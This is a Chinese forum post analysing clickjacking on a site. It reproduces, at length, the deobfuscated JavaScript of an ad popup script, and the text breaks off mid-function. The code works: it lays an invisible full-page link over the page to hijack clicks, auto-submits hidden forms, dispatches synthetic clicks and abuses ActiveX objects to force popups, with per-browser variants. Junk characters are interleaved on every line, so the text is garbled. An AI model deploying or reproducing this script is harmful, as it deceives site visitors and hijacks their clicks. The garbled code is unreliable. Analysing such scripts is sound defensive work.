天星网ClickJacking点击劫持分析
- j' ~+ C- z6 M& B* J+ zhttp://www.21tx.com/ 天星网
4 d' l% H/ H( U我得联系联系作者
b* y. V$ N9 y# ^刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
2 z& s" B. O' j5 T; |http://www.lxting.com/script/popup/v1_min.js1 M' G2 P' P J* I0 n5 U0 [
# P8 O3 L) i; O3 ?" n) S5 W; ~这个是锁定到底JS脚本,
0 h# X0 T7 O! z$ V$ K, L解密后的代码- (function() { * D3 b8 p, U4 [5 A2 e: r
- var aa_url = window.ytpp_url;
* I2 H6 m# H$ c i4 t: Q - var ua = navigator.userAgent; - V5 K/ ~7 @/ c0 i2 ^
- var form_div = document.createElement('div');
& q* B( K8 f7 I - var form_pd = 0; 1 t& q* l* A, b, H
- var browser = {
* ^9 T- z% D- s; F$ m3 J - ie: /msie/i.test(ua),
, H9 S0 j6 I' V% h - ie6: /msie 6/i.test(ua),
" o/ S2 \8 ^8 B' q - ie7: /msie 7/i.test(ua),
( n2 @! B ? ]) a& s - ie8: /msie 8/i.test(ua), $ X8 y, t" m, j: F
- ie9: /msie 9/i.test(ua), % h1 r( @7 q/ i* h) `
- 360 : /360se/i.test(ua), p# M& |+ P& C
- sogou: /;?se.+?MetaSr/i.test(ua),
7 O' Z/ }( Z% q5 A* ?) O: E0 U9 H - maxthon: /Maxthon/i.test(ua), ! B8 u% ?8 e- h$ ?, l; p% b* M
- tt: /TencentTraveler/i.test(ua), % j Z' y! y' ]0 b u s, a, l
- ff: /firefox/i.test(ua), ) y) Q+ Q9 ]+ k# v0 S2 W% t
- webkit: /AppleWebKit/i.test(ua),
5 l6 c! z7 r& z3 N - opera: /Opera/i.test(ua), , r' y5 p; [" X& H+ E1 m' E5 G
- qqbrowser: /QQBrowser/i.test(ua),
3 o, I, X& {+ _7 m2 S. I/ U7 y. N- X - cr: /chrome/i.test(ua), / }& p7 }5 G! d; F, E6 T$ w
- gg: window.chrome,
9 o/ k5 X- x R* l; \. ?6 ` - theworld: /Theworld/i.test(ua)
* j8 t* ^0 u( g - }; , V3 D9 F% U% x+ M& w% p, B
- var _setting = ""; 4 h7 u/ W4 L+ V& E0 X
- var _ct = 0; 9 r7 z5 m: O. V! A* g2 R
- var _le = 0;
, [& ^5 \; f4 k - var _pd = 1;
( u& N/ z) z, E# |3 k4 M7 r' { - var _pd2 = 0; - e, c9 E" k" G+ e) z" H
- var _pc = 1;
* O1 u# |/ A: a4 h2 t - var _pc2 = 1;
, ?& b5 P% l9 [* Y; w ?& N - var _pco = 0;
9 Z4 b% n, @7 }6 x3 D - var _pta = 0; 0 t1 S% B" x o* P9 r; ` @9 Z
- var _ptb = 0; . q/ |& ?1 C/ ~; [
- var _pt2a = 0;
! Q6 B/ n& |- s2 Q - var _pt2b = 0;
; S9 W3 Y# r {$ ~ - var _pt3a = 0; # u3 A, X; j0 u. W. Z
- var _pt3b = 0;
2 } g( V2 X! ~ - var _pt4a = 0;
2 ~# S$ L* w( j' q. z - var _pt4b = 0;
, I1 i; W( {* j2 ~' k/ a/ G - var _pt5a = 0; 5 ]% A/ ~9 O/ z V6 X: m" W8 W
- var _pt5b = 0; 3 I7 T- B/ E) c! ?3 X1 V' ?# Z
- var _pt6a = 0;
1 k9 s! ?# Q# s0 k4 K0 i - var _pt6b = 0; + H& x9 ?6 f1 p. W) v
- var _pt7a = 0; m6 _- P" a2 l2 l# k# K
- var _pt7b = 0;
0 T$ C: Q% h& x. G+ u3 F - var _pt8a = 0; : L y6 w/ d+ `& z
- var _pt8b = 0;
7 \# C5 {- ~) N" }; Q0 G3 h - var _pt9a = 0; " K+ N, R& b# h! Q& x" l
- var _pt9b = 0; # e# t! G3 D; c
- var _pt10a = 0; 1 D2 d% \/ `, O1 _4 E
- var _pt10b = 0;
/ D" {3 D" q; k - var _po = 0; 5 `6 {6 h" {/ V- R2 Y, ]6 i8 c# n( d7 Q
- var _poo = 0;
) U1 n; @3 g0 {6 n. ? - var ckn, ckt;
4 ?* p* F+ i" M+ q* U - var ads = 0;
8 g' z# t& a6 D& i - function b(w) { " ^) ^5 E+ I- i( L4 W
- var s = w + "="; ! \0 P7 Z) P2 |! `0 l8 F
- var r = "";
* o" S9 W' N2 K N - var o = 0;
2 }3 L- X7 ?$ V/ U @ - var d = 0;
! ^- R( Q0 |/ i* a2 p! L* w! n - var p = document.cookie; 7 P$ p( I9 G. B; |8 M
- if (document.cookie.length > 0) { 3 j4 }9 ^. p$ K' z/ o2 J$ r
- o = document.cookie.indexOf(s); + m7 f2 s1 s% e2 d/ b# t
- if (o != -1) { $ Q: {' y: e6 ?) o$ F4 t% c3 {( \
- o += s.length;
0 t; E# G' l" C: M' I) h0 N - d = document.cookie.indexOf(";", o); 3 A& T" K, X" T5 t
- if (d == -1) d = document.cookie.length; - E$ H* ~( o3 K( v: d
- r = unescape(document.cookie.substring(o, d)) $ m! ~/ R# d2 w- x
- } & t9 }6 L4 j, @ T; p
- }
; W3 c7 D! D0 z& S - return r ) x9 j6 p7 ?3 |3 N' b* Y! j r* Y
- };
. ^6 \$ r; f/ K# G- g6 e' w) w - function p(w, p, v) {
! E* J9 k# [9 h1 H. x$ s - var t = 30; 1 z+ U) F# Y7 F/ H2 @, m
- try {
. B( y* ] w' H% I) ^ - t = parseFloat(p) * 1 7 P% A. w" D9 j# k
- } catch(e) { 4 C$ Z* Y+ A* L
- t = 30
; Z7 w2 x# v& [& X Z - } 2 c" v( k3 V% \5 x4 h" T
- if (isNaN(t)) t = 30; ! F j# s, m c0 v
- var then = new Date();
6 Z# E, G+ P6 ^1 k# e# [ - then.setTime(then.getTime() + t * 60 * 1000); 8 l% Z& [2 U! z" j5 c, | ^% I2 \3 B
- document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'& ^1 Z5 a+ I3 o( g r' k
- };
% G1 r6 m- e. G: A. ^5 a - function init() {
# p4 \0 Y! i. p! ] - _setting = ytpp_sti;
. Q8 p5 y5 Y/ N. i2 D - if (getp(_setting, "CT")) { 2 M, B/ U9 V0 }, {/ S
- _ct = getp(_setting, "CT") 1 [2 o8 w/ C4 q6 P- v
- }
" ?' o9 S+ N5 @( w) W! g- Z; g - if (getp(_setting, "LE")) {
3 _4 v8 d7 t+ S. k - _le = getp(_setting, "LE") 8 p I" P) ^1 H) B8 _
- } . h. n. P% h% x& p& ]' [4 T6 ^. Z
- if (getp(_setting, "PD2")) {
/ ^; |3 M( K. l5 v \0 l2 k2 v - _pd2 = getp(_setting, "PD2") 9 ^/ K: n# |* C- {% |6 H, @
- } 7 H9 B1 O0 w) e3 Y5 k
- if (getp(_setting, "PC2")) { 0 |- n$ H5 w5 R
- _pc2 = getp(_setting, "PC2") 3 o. @1 |& Y1 w
- }
/ W5 l! z& _8 E. w7 ?+ {6 |4 s - if (getp(_setting, "PCO")) {
3 s* ^1 ?9 i, r! F* b& j. Q - _pco = getp(_setting, "PCO")
3 b1 Z# Y1 I" \: q6 e6 y" u - }
; [" ?& e" N2 G6 K# s - for (var i = 1; i <= 10; i++) { " E5 Q0 ]" I3 a7 |
- var n = i == 1 ? "": i;
( K: K. P) i P; t0 F& b$ q - if (getp(_setting, "PT" + n)) {
2 P8 [$ f6 K. y- X8 Y - eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); - e9 k$ {' [: Y( k
- eval("_pt" + n + "a = _pt" + n + "[0];");
4 ]7 m+ x3 l+ X5 c! b8 ?* } - eval("_pt" + n + "b = _pt" + n + "[1];")
. u* g# U, A0 l. _8 g6 {" K! G - }
/ n) ?2 j6 S3 y6 G/ Y - }
; @; Y' s9 ]- U- M* h - if (getp(_setting, "PO")) {
9 k+ P6 S; Y4 t6 v$ u, S' j - _po = getp(_setting, "PO") 2 F# C4 j; u+ e! e7 N, _
- }
% K4 Q+ B: Z. K( U* B - if (getp(_setting, "POO")) { 9 C6 z. h, P7 L. }" k
- _poo = getp(_setting, "POO") - y$ y- s/ l0 r0 A% R" \; q: N2 Y
- } % N/ q0 `3 d& O6 ]4 n+ G5 g
- if (_pco == 1 || _poo == 1) { & f! @/ P1 ]7 n7 z! C8 N! B1 ^) W
- if (_poo == 1) {
- I' K: [' z' A: X+ P! a/ _8 B- ?0 ? - _pco = 0
: i. @* N4 h' f4 U$ t% V1 h1 g - } else {
- |4 T! ?7 |" C9 H& ~1 T2 ?) q - _poo = 0
: J8 b% d3 ]: q c) G( ` - }
/ }. r8 x0 X# L - _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 7 ~# h# m3 b% A a& k
- for (var i = 2; i <= 10; i++) { 8 o# y% g* _7 g' {6 Z
- eval("_pt" + i + "a = _pt" + i + "b = 0;") 8 k" D" `! s/ S; T
- }
7 ^& H4 K/ g2 k: p! a - } 4 D3 W9 T: w; i2 X0 W2 g# D& P2 N
- };
9 X3 J9 Q/ z" r& t! ]# E/ w - function getp(s, p) { 4 ~; r1 v* F4 F5 o
- var i = s.indexOf(p + ":"); ) r/ N7 b4 ]' T% G0 a' K% W* u
- if (i >= 0) { ! @/ l5 n+ m% x6 n
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) $ k9 j: M2 x; [# M
- } / I4 a0 T5 Y2 O
- }; $ n( W$ Z; ]2 _0 ^
- function event(e, event, func, act) {
7 o6 }( e( w4 o. V - if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); 4 ^* Z# h! f) X5 Y7 c2 s
- else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
/ u4 m' i8 U4 Y - }
( y: Q& R" r2 V* t& e - function pop(url, param) { 9 A3 }9 Y$ h; b
- if (!document.body) {
. f7 F: T& _" k2 [( ~1 c - return setTimeout(function() {
: d/ ]( R# o& w6 P - pop(url, param) 6 c' Z9 M. }, O+ [1 `5 `( ~) M3 z
- }, ; M" Q' G9 y' v* I. A# q5 M1 y6 v+ }" P
- 13)
: S0 s% A# X+ R( _' s0 \* ` - }
1 E! W8 J$ ^! k# Z4 M ~ - try { 0 I0 k/ q, T. ?$ E
- if (browser['cr'] && browser['gg']) { + c; c, E" @. g, r ]+ |
- try {
& ?+ t, B4 E0 \, o) [ - hrefopen(url)
: l: ^' _4 b6 L% B; D - } catch(e) { ! x- s. c j7 A! U' ~" \" ~+ z
- a_pop(url) 5 }9 w+ R4 O' N6 P
- } " y+ a: q5 ? a& o$ H4 Y, f/ O
- } else if (browser['webkit'] && browser['maxthon']) {
7 Y9 q- C+ y, d; V) @ - if (!func(url)) { ( V! p. l6 k) ^) W+ r
- try { * M5 l# |. |4 j$ `6 c" L2 B
- form_pop(url);
; ]2 u0 v- Q" o g5 }- } - a_pop(url)
g! E. w# g: U5 c: B" | - } catch(e) {}
6 Y8 Q0 h& |+ ^% L' ` - } . B8 E E/ _: U6 d4 p
- } else if (browser['tt']) {
" M/ P& }5 E/ u& t3 y' h8 Y* f - try {
% T! R' b r- L2 v$ e - object_pop(url)
' s' a9 H+ I# @& o: a - } catch(e) {
) U' N6 Q& f6 Z+ z R4 [ - a_pop(url) % |4 P4 D" J9 l' T1 Q, g
- }
* n% v/ l9 g/ O/ O - } else if (browser['sogou']) {
' j9 X% i! V4 X - if (!func(url)) {
5 p: o' _- U$ x. n - try {
- x" v# ?1 x) \. C. b: w- e - a_pop(url)
e% f4 s5 i5 v$ h; z3 ? n - } catch(e) {} & q; M8 t& n3 Z3 h8 [* l" x
- } + I6 t3 W5 H4 }9 L# j, b) ^2 ?5 q" b
- } else if (browser['webkit'] && browser['qqbrowser']) {
; d) [) l/ m: U3 e: p+ D3 A - if (!func(url)) { 7 n7 O- h5 J* i: D: z6 w
- try { 0 E1 G6 _. q1 p0 w3 Q1 ]( U( V
- form_pop(url) . z+ w$ { T9 i
- } catch(e) { & i$ b5 a. m* @* e3 B, |- z. s: \
- click_pop(url)
8 p& x$ z0 | M- D+ _# S - } 8 Y6 Z3 y: A: R% q$ s9 |
- }
. z( e, W$ s+ ? - } else if (browser['webkit'] || browser['opera']) {
5 _$ x2 X+ T9 x+ |0 ]0 l+ L - try { * K5 h9 ? t; S2 C* V `& I- m" I
- form_pop(url); ' Q5 G# s& ~0 l% x& ?' `0 c6 S! r
- a_pop(url)
* T6 @ A# A/ f; u, f - } catch(e) {}
9 \( x$ s2 {& _8 R9 B - } else if (browser['theworld'] && browser.ie6) {
+ O# i; E& ]+ x1 a, n - if (!object_pop2(url)) {
2 ]" l k/ ]% m6 E7 z - a_pop(url) 4 z2 o% [. W; J9 C, t& S) p
- } 4 v8 L' C \; R
- } else if (browser['theworld'] && browser.ie8) { % N5 m" q; `2 B2 A+ P) m
- if (!func(url)) {
3 h: ?/ X) O# \- U - try {
+ q) z1 n9 n0 u9 M - object_pop(url)
* q9 H6 u# T) ?8 j0 v2 B1 H. d - } catch(e) { ' B. v* f2 {/ g: t, B
- click_pop(url) / t* d. n2 V- g" n$ D: t, n
- }
& I0 H; U6 G9 t- c' E - }
% v( h1 J; C% R - } else if (browser.ie6) {
) H4 f; O% G! ^/ S3 u' Z1 L( O: U8 o - if (!func(url)) {
2 o3 u6 {% j- W9 R* C - object_pop2(url) E. r; Z( r% ^& ]# Q7 `
- }
9 s& h; U, a' E- Z; R6 M; A# I - } else if (browser.ie8) {
; z, \8 t6 l8 ^& ]& B# T - if (!func(url)) {
; l; f0 B* y7 }! ^0 b - try { 4 H1 D" S! O( Y$ Y" A3 r) r7 F7 w
- object_pop(url) , O+ e8 G4 P' { `" [
- } catch(e) { 6 \$ B7 I% i0 N' v" o* D! Z0 e) u2 R
- document.onclick = function() { 3 v4 l/ H5 T& o2 V$ M; ~1 }
- func(url);
0 b8 f, g) ~7 ]; y X1 K - document.onclick = null
2 R }5 \; @( L, I - }
& n3 s6 s+ s) | - }
0 F# q Y. R$ i8 U' [, {2 ~ - }
" W$ g9 ~7 q- ~) D: W - } else if (browser['ie']) { ; \0 }# S2 O& \6 D$ ^, H
- try { 7 r* P I6 K2 s9 j7 F4 @1 e
- object_pop(url)
4 w% x p/ _2 q0 l( M% L/ c ]$ L' k - } catch(e) { 1 j* h2 b; h$ @1 P
- click_pop(url)
( h1 Y4 Y/ B6 k$ A) L8 Z9 m - }
: y% N3 Y6 J. P- F+ d' c3 ^ - } else if (browser['ff']) {
( p) p Z8 }6 z! E9 E2 Q - if (!func(url)) {
, b9 g/ c4 \( w# s* c: M - click_pop(url)
' E8 \9 ?5 K4 N, T+ A1 A - }
2 O2 {1 I( H; A" Q, w - } else {
: c( L# s9 x6 B' K7 Z - if (!func(url)) { ) F1 E, W- d# F9 {" d J) h7 D' x
- click_pop(url) 6 b. V9 M$ J( M8 |
- } + B8 ?+ [% e4 W a3 C
- }
; Q) F: m/ i6 v+ X5 i2 u - } catch(e) { \4 `: B; S: g: W/ A4 Z& l
- if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { % {7 F r. @" y) l' w4 X
- click_pop(url)
3 F+ x/ S. N4 g# E! P- I2 z - } else {
5 t" ~2 z9 U1 s7 ], U' n: x7 b - a_pop(url) 2 Y+ ]9 _' g7 p$ M$ U- Q0 M
- } # D; Q0 w. N* m; N
- }
& A+ P: Y: y+ o& v - } " T3 q9 b2 Y" y
- function object_pop(url, param) { 4 i1 C* K n# d2 L2 T& @9 Z4 {% b) w
- var object = document.createElement('object');
0 ?+ o3 X! E4 Q+ m5 x# r( B8 F - object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); ' U8 `, D: W1 T2 s) T: y( U
- object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
2 X0 j1 B7 ]4 U& O; x( H - append(object); * e5 u2 }% N- ]& N$ ?7 W. |9 H# |
- object.launchURL(url); # i' j6 y) F- I
- ads++;
5 @& `. t% k: R% v5 o/ N. k - p(ckn, ckt, ads) ) ~8 d1 |! v3 o- B6 Z( ~% q
- }
2 e: o' K9 d1 K3 I5 F" Z+ r X - function object_pop2(url, param) { % q9 ]& v# i: X' _2 {0 I
- var object2 = document.createElement('object'); ( [; y+ Q; r; U* G: V* |
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); * h' I4 C1 t% l. T( c3 D; k
- object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; ]9 h+ f& e% ^
- append(object2);
/ p/ q: L2 b( s# R" Q: {7 k: W - for (var i in object2) {
) J6 r3 B V) x' z - try { (function(o) {})(object2[i])
5 F7 B2 l( H- j* s t# k - } catch(e) {} 5 u6 d6 f6 x' ]' v# b
- } # r0 |' F/ D; \' Z/ N2 X/ L. [
- setTimeout(function() {
& h; G7 Q( P! s, s+ j - object2.DOM.Script.open(url, '_blank', '') 6 k+ z" ~$ L+ Z7 ^+ z
- },
2 B' t8 A/ H: E4 r! C6 R - 500);
: M3 m' N$ d/ k. [* e3 G& J7 F! a$ I - ads++; ' h; l* A' f2 T2 v T) l. y0 l
- p(ckn, ckt, ads)
; P% X0 \# }) C1 Q% P' r - }
8 R$ J% D: m( P. F - function append(e) { , c7 I! [" U" y# V6 J
- for (var t in { : t% Q. [0 Q$ q( z1 d4 v( w* s
- body: 1 8 C7 w" v" s2 X" }1 A4 Q
- }) {
+ M9 v; `% ^' m: ~; z - var ele = document.getElementsByTagName(t); 5 M8 I, E7 ]0 ~: X0 E3 p
- for (var i = 0; i < ele.length; i++) { : ? t, U) ^$ R" Q$ ]3 R; U
- ele[i].insertBefore(e, ele[i].firstChild); % e p- G+ B) t. D* _# A/ w4 R
- return
2 d9 i5 D7 [$ A" l. X# l - }
: ?. s: P. ]3 x; o; H - } 3 e, a ~6 V6 s: O( S( e" ?+ Y
- }
$ w" ?! E( f/ k8 F$ J. ^* {! d - function hrefopen(url) {
0 C0 n# a8 V- }' D" C - try {
% s' V( x# I7 a/ O( G. |) d% ~ - var c = document.createElement("a");
U2 z0 B8 W& r" o" E - c.setAttribute("href", url);
* Z; \7 t3 V Q' P- }# b9 X- Q - c.setAttribute("target", "_blank"); - P! H) c: t; n7 s) ~
- c.setAttribute("style", "display:none;");
; N6 m6 _+ d6 {. d3 U; @* c2 ~6 F - var b = document.createEvent("MouseEvents");
+ B! o7 G9 n6 o- Q, S% w k - b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
5 u# o% u8 c5 S) L& r( x8 U: \# a - c.dispatchEvent(b);
/ m( y3 C4 s8 f9 S- F$ r x - ads++; ) p t- Z- V9 u3 H; R$ o4 `0 @
- p(ckn, ckt, ads); 9 S1 S7 n" M3 ~- ]+ O2 q
- return true
- E* v8 v+ |$ g7 l - } catch(q) {
]/ a) A& t" F, o. h0 x- X - return false
2 u. U' i! J; d7 U# [# Y - }
( k# t% r7 B: r, \" T, [, b$ M - } " b K* ^, k, s8 V8 ]0 s! l
- function form_pop(url) {
; x: i: D" z" A( d+ | - form_div.setAttribute('id', '__unionsky_push_d_object_box__'); + a% @* k1 U) I( }4 Y
- form_div.setAttribute('style', 'display:none'); ) P5 v6 I* n* t! k D
- var form = document.createElement('form');
7 k; i6 u( ~" w/ u9 \3 a - form.setAttribute('action', aa_url); $ m: P1 \! E0 k7 |; g
- form.setAttribute('method', 'post');
' E2 n4 W* o5 l& H: a4 q - form.setAttribute('name', '__unionsky_push_d_form_box__');
* E' U$ i4 O( Q( y* ^- O5 l - form.setAttribute('target', '_blank');
) p @/ W, ?; T# ]6 A: x5 m) D - form.setAttribute('style', 'display:none'); 7 w5 S( o$ r& j! g L
- var sinput = document.createElement('input');
! z d# w: |2 k0 t' M7 \ - sinput.setAttribute('style', 'display:none'); ) W& O0 U' E3 [8 z* |6 U
- sinput.setAttribute('type', 'submit');
s/ n# h' \, U9 ^8 y, E0 Z& ~ - sinput.setAttribute('id', '_sumit_2app'); 8 W# ~4 L3 a5 @# z
- form.appendChild(sinput);
9 J/ V3 ^2 K* M! c2 A; H - form_div.appendChild(form); - [9 ~3 p( Z% A
- append(form_div);
: C7 [6 |$ V4 ^6 Q5 h8 ] - var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
/ f8 E7 _% p, v* ?$ u* c4 e1 k - try { 7 q$ u7 Z( \1 D- @( z. K* U8 c# J) ?; R
- document.getElementById("_sumit_2app").click()
- G& Z, i3 k8 N! w9 B9 | j - } catch(e) { J7 \3 M# V/ [/ [
- event(document, 'keyup', + n) Y+ c* v* c2 v* U1 ^
- function(e) {
" J% t+ y3 S: K - if (document.getElementById('__unionsky_push_d_object_box__') == null) {
! }4 z' C- k% P$ I* {! ?. v/ Q7 p - return* [& S7 n7 z' {9 Y7 b2 \
- };
0 u7 O/ v" Q+ E, j$ n - e = e || window.event; 0 U' D4 a+ l* J$ f" @
- e.canceBubble = true;
- f' W3 n: _* [+ }. @! N - event(document, 'keyup', arguments.callee, true); 8 k4 Q- b* q0 x" J1 Z3 r1 F# a) q
- form_pd = 1; . @. r& W; ]1 {; i1 q+ o% i9 X
- unionsky_from.submit()
" L" @7 c; U3 t2 Z5 M- j - })
/ V0 z4 j1 {! u2 z$ D& ^2 O! W3 J - } ' X |. D. ?- y( w/ I2 X
- }; 3 T q- f( Q u! E
- function click_pop(url, param) {
4 \7 @" Z7 D, e - event(document, 'mouseup',
0 s6 `( j8 O% J2 j& @ - function(e) {
6 m& F0 b" ?7 K9 c - e = e || window.event;
4 E% r2 I9 T# [2 f! w- u - e.canceBubble = true;
- @* k! ]6 x" I - event(document, 'mouseup', arguments.callee, true); 6 \0 y$ M. D9 g# a$ D
- func(url, param); " D+ R# z* ^( z2 b
- ads++; 8 h; F3 l# a6 C/ c. s% ]+ J
- p(ckn, ckt, ads) 1 E5 c/ g2 Y1 f' X7 F: ~
- }) 8 n* }0 H% \* P5 d1 h
- }; - R2 C9 q- \# {) g8 N: ]6 c
- function a_pop(url) {
1 m7 u3 d$ b7 M# ^$ ]8 o - if (ytpp_plid == 166028) { ; ?: g' _9 n l. @9 h4 V4 n
- return
' Q+ ]+ X) q$ l" w- B - }
, ]9 Q7 f6 q+ J/ h+ } - if (!document.body) { 4 y+ ~+ g# k$ e6 H
- return setTimeout(function() {
) _- u, U& b% u - a_pop(url) : Z3 J% O7 K$ j
- }, 8 |( A+ R6 G7 l8 R# V& E
- 13)
7 H6 t$ z7 v. T) t) O* M) U2 i - } 6 ?1 |+ l! R. c. T. x- |
- var a = document.createElement("a");
( \; Q5 x" B" r1 K$ k - a.href = url;
9 q/ s$ h/ V/ t4 ?& }5 M5 @% f - a.target = "_blank";
- }+ l- @) S! M' `' N) F - var div = document.createElement('div'); % P3 s# u& \) B9 h- _7 \
- div.style.backgroundColor = '#fff';
7 u0 u# C0 E7 P3 U1 G - a.appendChild(div); . N% S1 s D1 Y' G; Q4 K7 m
- append(a);
4 i* M: g4 m K3 D# E: m# P0 K* T - var as = a.style; : F& ~% r( x, H( G& R" s C
- as.position = "absolute";
& M) w2 K. a; N9 a4 v - as.zIndex = '2147483647';
& c5 F- @ I( i# P; e7 E - as.display = "block"; . R6 F1 j) L- h' a/ a9 Y: A/ w
- as.top = "0px";
$ O5 W _8 J8 V0 Y! B$ N& h, C* q' x - as.left = "0px"; / T# P$ {& g' I. a3 |& N
- as.cursor = 'default'; ' G* f. }% F/ J- s9 I5 Q' f
- as.opacity = "0";
) T+ ^/ B* ]% n1 j1 r; b( ?5 c Q8 v3 K - as.filter = "alpha(opacity:0)"; " G( h3 f" i1 ^
- var m = setInterval(function() { 0 V5 C7 H1 F: I
- if (form_pd == 1) { ( y" G0 H4 {6 V$ g
- a.parentNode.removeChild(a);
. e; Y# J2 a+ Q { - clearInterval(m); / Q9 e6 g. F+ X Y' |- y
- return
( I. W/ m# ?1 y - }
3 x; H/ N7 U& W; t3 C2 B - a.style.zIndex = '2147483647';
4 u7 \! e1 m' \4 O4 o; L$ S( H - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
& H6 R3 f3 r1 w) S8 D# ` - a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
( h; f" I9 ]9 ~% X8 f - div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px'; 2 \4 L/ h: O+ x) K6 ~5 B' o
- div.style.height = d.clientHeight + 'px';
' {+ p7 ~' p0 ^! q - if (browser['ie']) { + q' z: \: i( m# V
- try {
$ t1 E5 J" z3 `5 p3 P+ z$ G - var divs = document.body.childNodes;
; i9 N3 G5 L' y - for (var i = 0; i < divs.length; i++) {
5 K8 g B* f3 [2 B. ^6 A - if (!divs[i]['style']) { 3 ^) `2 H1 f* X1 d+ T
- continue
. F6 J1 V- c% v - } ' B: C' R. G/ s$ K
- var _i = parseInt(divs[i].style.zIndex); : ?; C' E j9 I* b* x( v
- if (_i && divs[i] != a && _i == 2147483647) { # K! ~6 x( s; P' {: d
- divs[i].style.zIndex = _i - 1
6 K/ A- Q A' q1 U# H4 o - }
+ P% ~. g; t, {4 Z0 v - } - |3 j) Z& D9 |5 `% Q6 a
- a.style.zIndex = '2147483647'4 k9 z! ?' u# J
- } catch(e) {} & Z! o8 B; @* Y: |
- } ; l5 D0 Z- ]$ v V& ^
- }, H6 _/ z+ z. V0 o. G# x9 B ` T
- 120);
8 o9 q& `, R. @4 y - a.onclick = function(e) { . h. X/ Z. z& n, Z
- if (document.getElementById('__unionsky_push_d_object_box__') != null) { 8 `( z9 {0 p/ q7 P5 }5 S
- form_div.parentNode.removeChild(form_div) ' i/ e8 b4 W: D, L, w3 U. h
- } 8 l9 c4 t- H3 b7 r, i/ j4 J
- e = e || window.event;
/ P% T& f0 H' w* j- w; l* _! A - e.cancelBubble = true;
2 b# ^ ^1 E- }* Y+ O, e - setTimeout(function() {
2 t3 B# B& I+ x) p* [+ d, l - a.parentNode.removeChild(a) / p- U) w8 ]7 o( ~) e9 q3 S
- },
0 w8 {9 O# q# C* ?) I - 200); ' V5 G9 [/ L4 q
- clearInterval(m); : f, f% q# }7 e/ K8 C& o' J* u
- ads++; $ S* ~; h; F% x6 Q+ H8 {6 r
- p(ckn, ckt, ads) - s# ~4 `# L. {
- };
$ c" j7 M% @ c$ A; n - event(a, 'mouseup', ' n. X# R& y7 N! _. l
- function(e) {
3 ~& g; c' q9 ?4 N' o* y7 W8 @ - e = e || window.event;
% ? u& C# k5 v( s - e.cancelBubble = true4 e6 m. S! j/ o T9 j
- }) # o9 o5 M$ {( L) }( C5 O
- }
; f: }5 l b% C. i& s - function func(url, param) { & k1 W% h; a, O9 z
- var f = window[String.fromCharCode(111, 112, 101, 110)]; & ]: C( _5 {5 A! Y, k. e
- var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
" [( S, [. |; K. y - if (w) { 7 |8 P* B. q( o8 Z/ R# g* _
- ads++;
7 g$ d/ E) C+ q e4 x7 i; L - p(ckn, ckt, ads) : [( ?- V" i n0 o
- };
& L$ {% J! ^ i1 j - return w # y6 h: Z5 B/ C$ e
- }
' z! B4 T$ K6 k/ }, F& t - function fstart(url) {
_' c. D; p2 T, a1 A - init(); " p$ i5 ]! b/ t6 B3 Z
- if (_ct >= 0) {
: [% P$ e( J2 s0 q3 V7 Z0 z - ckn = "YITIAN_NUM";
3 w& A- a, o* K( ~& o - ckt = _ct 7 R; q- W& K1 w0 U- R1 h/ j
- } else {
' M0 _: O, q: y0 P- v - ckn = "YITIAN_ALL"; 9 G1 ^* S' B* k ~3 I, M+ @
- ckt = Math.abs(_ct)
" r) t3 P+ c p+ s5 p A - }
) k T4 {% I0 G: d+ x" X - if (ckt > 0) {
5 {) o8 l, C3 s9 e - if (b(ckn)) {
! o) ~! C% {. g: t H - try { - Q) b; \- H% A3 z6 c# Y
- ads = parseFloat(b(ckn)) . D7 y! ~- q4 U5 I) s
- } catch(q) {} ; U4 U+ {, I8 E3 C
- }
9 N& c7 y+ h( G - }
8 k# E2 o \8 y% w9 m# w0 t4 h/ b/ _ - if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { & v9 S0 R/ f p4 z
- return- F9 N& [% W8 }: {
- } else {
4 |6 W4 M! [2 v - if (_le > 0) { - r+ i1 ~5 f1 A# @& y
- setTimeout(go(url), _le * 1000)
, |! i( g2 Z3 X& J1 g, w4 Z# o - } else {
6 ] s+ s) K! t! z3 T5 ^ - go(url) 9 Y. _/ c4 `- N( [& z2 `. {7 v
- }
% H+ h3 _1 j% I" s* e - } ( |- z) H- |4 a; N; t$ Z5 }
- }
: S7 p2 o4 u% ]; t3 C9 \/ y - function go(url) {
$ t) g: U2 ^" d( T& y( e6 R" u - if (_poo == 1) { 0 k3 ?6 ^8 i( E2 W
- try {
- K5 c; }! x) }# Z - func(url)
& u5 v$ Q$ @ e2 g& ^ - } catch(q) {}
# j; C. W- q9 T2 T - } else if (_pco == 1) { " L/ _5 y, a7 Q5 u' I( {
- a_pop(url) & [# M+ H2 l) Y3 B7 }
- } else {
$ q+ S+ A, B2 R @& N+ \ - if (_pd == 1) {
6 w7 l( ]3 i/ `# P - setTimeout(function() { 9 e. z2 b( |; w; F
- pop(url, { ( y% E$ Y- M& r: m6 E
- a: 1, 2 r1 S+ }/ H0 B7 b6 C" _ Z$ O' ~
- b: 2 ! T% p- y# L- q" n/ e$ K& ~
- }) " Y+ Z/ T/ n; @& L( f, X
- }, l2 C" T& N' ^; {" O0 x9 X! L2 f" t
- 300)
b" h5 f8 ~0 M# S7 i - } * j. v' x: w2 o7 f: F& `+ Q) k
- if (_pd2 > Math.random()) {
